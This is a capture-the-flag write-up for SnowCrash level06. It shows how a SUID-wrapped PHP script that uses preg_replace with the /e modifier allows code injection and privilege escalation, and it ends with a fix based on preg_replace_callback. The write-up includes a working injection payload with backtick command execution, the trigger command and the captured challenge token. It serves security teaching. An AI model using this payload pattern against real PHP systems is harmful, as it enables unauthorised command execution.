==============================
SnowCrash - Level06 Write-up
==============================

Goal
----
Exploit the SUID binary `level06` to retrieve the token for the next level.

Step 1 – Binary Analysis
------------------------
Running `strings level06` shows:

    /usr/bin/php
    /home/user/level06/level06.php

This indicates that the binary is a wrapper executing a PHP script with elevated
privileges (SUID). The vulnerability is therefore likely inside level06.php.

Step 2 – Inspecting the PHP Script
----------------------------------

#!/usr/bin/php
<?php
function y($m) {
    $m = preg_replace("/\./", " x ", $m);
    $m = preg_replace("/@/", " y", $m);
    return $m;
}

function x($y, $z) {
    $a = file_get_contents($y);
    $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);
    $a = preg_replace("/\[/", "(", $a);
    $a = preg_replace("/\]/", ")", $a);
    return $a;
}

$r = x($argv[1], $argv[2]);
print $r;
?>

Step 3 – Identifying the Vulnerability
--------------------------------------

The critical line is:

    preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);

The `/e` modifier tells PHP to evaluate the replacement string as PHP code.
This effectively turns preg_replace into an eval().

Since `$a` comes from a user-controlled file, an attacker can inject PHP code
that will be executed with the privileges of the SUID binary.

Vulnerability Type
------------------
PHP Code Injection via preg_replace() with the /e modifier.

This leads to Remote Code Execution (RCE).

Step 4 – Exploitation
---------------------

Create a malicious file:

    echo '[x ${`getflag`} ]' > /tmp/file.txt

Execute the binary:

    ./level06 /tmp/file.txt

Explanation:
- The regex matches: [x ${`getflag`} ]
- Because of /e, PHP evaluates:
      y("${`getflag`}")
- Backticks in PHP execute system commands.
- `getflag` runs with the privileges of flag06.

Result:
    Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub

Root Cause
----------
Using preg_replace() with the /e modifier on user-controlled input.

This allows arbitrary PHP code execution.

Why It’s Dangerous
------------------
- Arbitrary PHP execution
- System command execution
- Privilege escalation
- Full compromise of the account

Proper Fix
----------
Replace preg_replace with preg_replace_callback:

    preg_replace_callback(
        "/(\[x (.*)\])/",
        function($matches) {
            return y($matches[2]);
        },
        $a
    );

This removes code execution and safely processes the input.

Conclusion
----------
Level06 is vulnerable to PHP Code Injection due to the unsafe use of
preg_replace() with the /e modifier, allowing privilege escalation.